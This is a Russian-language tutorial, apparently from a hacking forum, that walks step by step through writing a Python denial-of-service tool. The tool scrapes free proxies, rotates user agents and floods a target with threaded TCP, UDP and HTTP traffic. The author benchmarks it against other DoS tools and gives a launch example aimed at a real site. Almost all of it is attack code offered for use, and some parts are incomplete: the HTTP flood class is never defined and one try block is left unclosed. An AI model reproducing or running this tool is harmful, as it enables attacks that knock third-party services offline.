Очумелые ручки
Garant Copy
Сейчас я покажу вам, как написать инструмент для DoS атак на Python.
Код:
# -*- coding: utf-8 -*- import urllib.request import os import sys from scapy.all import * #отличная либа from bs4 import BeautifulSoup # Импортируем либы import socket import socks import argparse import threading import random import re
Вводим переменные без которых не будет работать программа :
Код:
sites = ["https://www.socks-proxy.net/","http://free-proxy-list.net/"] #Сайты откуда берем прокси useragents = [] ##Мощность DoS-а зависит от вашего интернет соеденения!!! multiple = 70 # Умножение, значение можно менять threads = 800 # Кол-во потоков, можно менять choice1 = 0 #Для настройки типа флуда choice2 = 0 #Для настройки типа флуда choice3 = 0 #Для настройки типа флуда port = 80 # Порт куда будут слаться запросы, можно менять
Мощность Dos зависит от прокси, а также от вашего интернета! Для того что бы повысить производительность, вы можете менять значение переменных multiple и threads.
Теперь добавляем в программу аргументы.
Код:
##### Добавляем в программу аргументы
parser = argparse.ArgumentParser()
parser.add_argument('-useragent', help = 'Путь до файла с user-агентами')
parser.add_argument('-proxylist', help = 'Путь до файла с proxy')
parser.add_argument('-url', help = 'Цель')
parser.add_argument('-getproxy', help = 'Получить прокси? 1 - да | 0 - нет')
args = parser.parse_args()
useragents_file = args.useragent
needproxy = args.getproxy
url = args.url
proxies_list = args.proxylist
if proxies_list == "": # Если прокси не указана закрыть программу
print("Укажи прокси!")
exit()
if useragents_file == "": # Если useragent-ы не указаны закрыть программу
print("Укажи useragent-ов!")
exit()
proxies = open(proxies_list).readlines() # Читаем прокси
#####
Пропишем получение useragent-ов с файла.
Код:
###### Получение юзер агента с файла
handle = open(useragents_file)
for x in handle:
useragents.append(x)
useragents = map(lambda s: s.strip(), useragents)
useragents = list(useragents)
######
Cделaем функцию, которая будет подгонять введенный пользователем URL под нашу программу:
Код:
def checkURL(): #Редактируем URL
global url
global url2
global urlport
try:
if url[0]+url[1]+url[2]+url[3] == "www.":
url = "http://" + url
elif url[0]+url[1]+url[2]+url[3] == "http":
pass
else:
url = "http://" + url
except:
print("Ошибка!")
exit()
try:
url2 = url.replace("http://", "").replace("https://", "").split("/")[0].split(":")[0]
except:
url2 = url.replace("http://", "").replace("https://", "").split("/")[0]
try:
urlport = url.replace("http://", "").replace("https://", "").split("/")[0].split(":")[1]
except:
urlport = "80"
Для работы программы нужны прокси, напишем функцию их получения:
Код:
def getPROXY(urlproxy):
try:
req = urllib.request.Request(("{0}").format(str(urlproxy)))
req.add_header("User-Agent", random.choice(useragents))
sourcecode = urllib.request.urlopen(req)
part = str(sourcecode.read())
part = part.split("<tbody>")
part = part[1].split("</tbody>")
part = part[0].split("<tr><td>")
proxies = ""
for proxy in part:
proxy = proxy.split("</td><td>") #Получаем прокси с сайта путем разделения тегов
try:
proxies=proxies + proxy[0] + ":" + proxy[1] + "\n"
except:
pass
handle = open("proxy.txt","a") #Записуем полученные прокси в файл
handle.write("")
handle.write(proxies)
handle.close()
print ("Прокси скачаны успешно!")
except:
print ("Ошибка!")
Вы будете указывать, стоит ли качать прокси, поэтому сделаем проверку:
Код:
if needproxy == "1": # Нужно ли качать прокси?
#### Получение проксей
for x in sites:
getPROXY(x)
####
Теперь давайте напишем функцию, которая будет определять какой тип флуда нужен пользователю ( это можно было сделать и через аргументы, но я решил сделать так))) ):
Код:
def typeflood(): # Определяем тип флуда
global choice1 #Для сайтов самый сильный - HTTP
global choice2
global choice3
select = input("UDP или TCP или HTTP? => ")
if select == "TCP":
choice1 = "1" # Изначально программа была в интерактивном режиме
choice2 = "y" # Но я убрал его, оставив лишь выбор метода флуда
choice3 = "0" # Поэтому переменные называются choice))
if select == "UDP":
choice1 = "2"
choice2 = "y" #Тестить мощь ваше DoS-а или DDoS-а можно здесь: https://www.vedbex.com/tools/dstat
choice3 = "0"
if select == "HTTP":
choice1 = "0"
choice2 = "y"
choice3 = "0"
Думаю 3-ех методов достаточно. Пишем функцию, которая будет запускать нужный нам метод флуда:
Код:
def loop():
global threads
global get_host
global acceptall
global connection
global go
global x
if choice1 == "0": # прописуем заголовки, чтобы не нагружать потоки
get_host = "GET " + url + " HTTP/1.1\r\nHost: " + url2 + "\r\n"
acceptall = [
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\n",
"Accept-Encoding: gzip, deflate\r\n",
"Accept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\n",
"Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Charset: iso-8859-1\r\nAccept-Encoding: gzip\r\n",
"Accept: application/xml,application/xhtml+xml,text/html;q=0.9, text/plain;q=0.8,image/png,*/*;q=0.5\r\nAccept-Charset: iso-8859-1\r\n",
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Encoding: br;q=1.0, gzip;q=0.8, *;q=0.1\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\n",
"Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, application/msword, */*\r\nAccept-Language: en-US,en;q=0.5\r\n",
"Accept: text/html, application/xhtml+xml, image/jxr, */*\r\nAccept-Encoding: gzip\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\n",
"Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Encoding: gzip\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\n,"
"Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\n",
"Accept-Charset: utf-8, iso-8859-1;q=0.5\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\n",
"Accept: text/html, application/xhtml+xml",
"Accept-Language: en-US,en;q=0.5\r\n",
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Encoding: br;q=1.0, gzip;q=0.8, *;q=0.1\r\n",
"Accept: text/plain;q=0.8,image/png,*/*;q=0.5\r\nAccept-Charset: iso-8859-1\r\n",
] # заголовок Accept передается случайным образом, чтобы запросы казались легитимными
connection = "Connection: Keep-Alive\r\n" #
x = 0 # для счета
go = threading.Event()
if choice1 == "1": # Выбираем TCP флуд
if choice2 == "y":
if choice3 == "0":
for x in range(threads):
TcpFloodProxed(x+1).start() # запуск класса
print ("Поток " + str(x) + " готов!")
go.set() # Запуск потоков, как только они все будут готовы
else: # Выбираем UDP флуд
if choice1 == "2":
if choice2 == "y":
if choice3 == "0":
for x in range(threads):
UdpFloodProxed(x+1).start() # запуск класса
print ("Поток " + str(x) + " готов!")
go.set() # Запуск потоков, как только они все будут готовы
else: # Выбираем HTTP флуд
if choice2 == "y":
if choice3 == "0":
for x in range(threads):
RequestProxyHTTP(x+1).start() # запуск класса
print ("Поток " + str(x) + " готов!")
go.set() # Запуск потоков, как только они все будут готовы
Сейчас начинается самое главное, мы пишем сами методы флуда. Я решил использовать классы:
Код:
class TcpFloodProxed(threading.Thread): # класс многопоточности
def __init__(self, counter): # функция вызывается практически только на счетчик потоков. Параметр счетчика функции, передает x + 1 выше в качестве счетной переменной
threading.Thread.__init__(self)
self.counter = counter
def run(self): # функция, которая дает инструкции для потоков
data = random._urandom(1024) # рандомная дата для пакета
p = bytes(IP(dst=str(url2))/TCP(sport=RandShort(), dport=int(port))/data) # построение пакета tcp + data
current = x # текущий поток
if current < len(proxies): # если поток может связаться с прокси, этот прокси используется
proxy = proxies[current].strip().split(':')
else: # в противном случае выбирается другое прокси
proxy = random.choice(proxies).strip().split(":")
go.wait() # ожидание, пока все прокси будут готовы
while True:
try:
socks.setdefaultproxy(socks.PROXY_TYPE_HTTP, str(proxy[0]), int(proxy[1]), True) # команда для HTTP-проксирования
s = socks.socksocket() # создание сокета
s.connect((str(url2),int(port))) # подключение
s.send(p) # отправка
print ("Запрос отправлен с " + str(proxy[0]+":"+proxy[1]) + " =>", self.counter) # вывод req + counter
try: # отправлять другие запросы в этом же потоке
for y in range(multiple): # коэффициент умножения
s.send(str.encode(p)) # кодируем запрос в байты
except: # если что-то пойдет не так, сокет закроется, и цикл снова запустится
s.close()
Прописуем UDP флуд:
Код:
class UdpFloodProxed(threading.Thread): # класс многопоточности
def __init__(self, counter): # функция вызывается практически только на счетчик потоков. Параметр счетчика функции, передает x + 1 выше в качестве счетной переменной
threading.Thread.__init__(self)
self.counter = counter
def run(self): # функция, которая дает инструкции для потоков
data = random._urandom(1024) # рандомная дата для пакета
p = bytes(IP(dst=str(url2))/UDP(dport=int(port))/data) # построение пакета udp (классика)
current = x # текущий поток
if current < len(proxies): # если поток может связаться с прокси, этот прокси используется
proxy = proxies[current].strip().split(':')
else: # в противном случае выбирается другое прокси
proxy = random.choice(proxies).strip().split(":")
go.wait() # ожидание, пока все прокси будут готовы
while True:
try:
socks.setdefaultproxy(socks.PROXY_TYPE_HTTP, str(proxy[0]), int(proxy[1]), True) # команда для HTTP-проксирования
s = socks.socksocket() # создание сокета
s.connect((str(url2),int(port))) # подключение
s.send(p) # отправка
print ("Запрос отправлен с " + str(proxy[0]+":"+proxy[1]) + " =>", self.counter) # вывод req + counter
try: # отправлять другие запросы в этом же потоке
for y in range(multiple): # коэффициент умножения
s.send(str.encode(p)) # кодируем запрос в байты
except: # если что-то пойдет не так, сокет закроется, и цикл снова запустится
s.close()
except:
s.close() # если что-то пойдет не так, закрыть поток и начать заново
Теперь добавим проверку, как запущена программа:
Код:
if __name__ == '__main__': # Если программа запущена как самостоятельная, то запускаем эти функции
checkURL()
typeflood()
loop()
Программа работает на windows (но я предпочитаю Linux). Для работы нужен python3 и установить библиотеки (pip install имя библиотеки).
Получить справку: python main.py -h
Пример запуска: python main.py -useragent useragents.txt -proxylist proxy.txt -url codeby.net
Получить прокси: python main.py -useragent useragents.txt -getproxy 1
Давайте протестируем мощность конкурентов моей программы:
Начнем с xerxes (качаем и устанавливаем с гитхаб)
https://github.com/zanyarjamal/xerxes
Результат:
Как видим пиковая 40 запросов, но далее запросы упали почти до 0.
Далее у нас идет wreckuests.
JamesJGoodwin/wreckuests
Результат:
Пиковая 50 запросов, далее запросы упали около 2-3.
Теперь протестируем созданный нами инструмент:
Это был HTTP метод. Пиковая 100 (иногда выдает 200 и выше, у вас может быть больше, если хороший интернет!), также запросы до 0 не падают).
UDP метод:
TCP метод
На этом всё. До скорых встреч.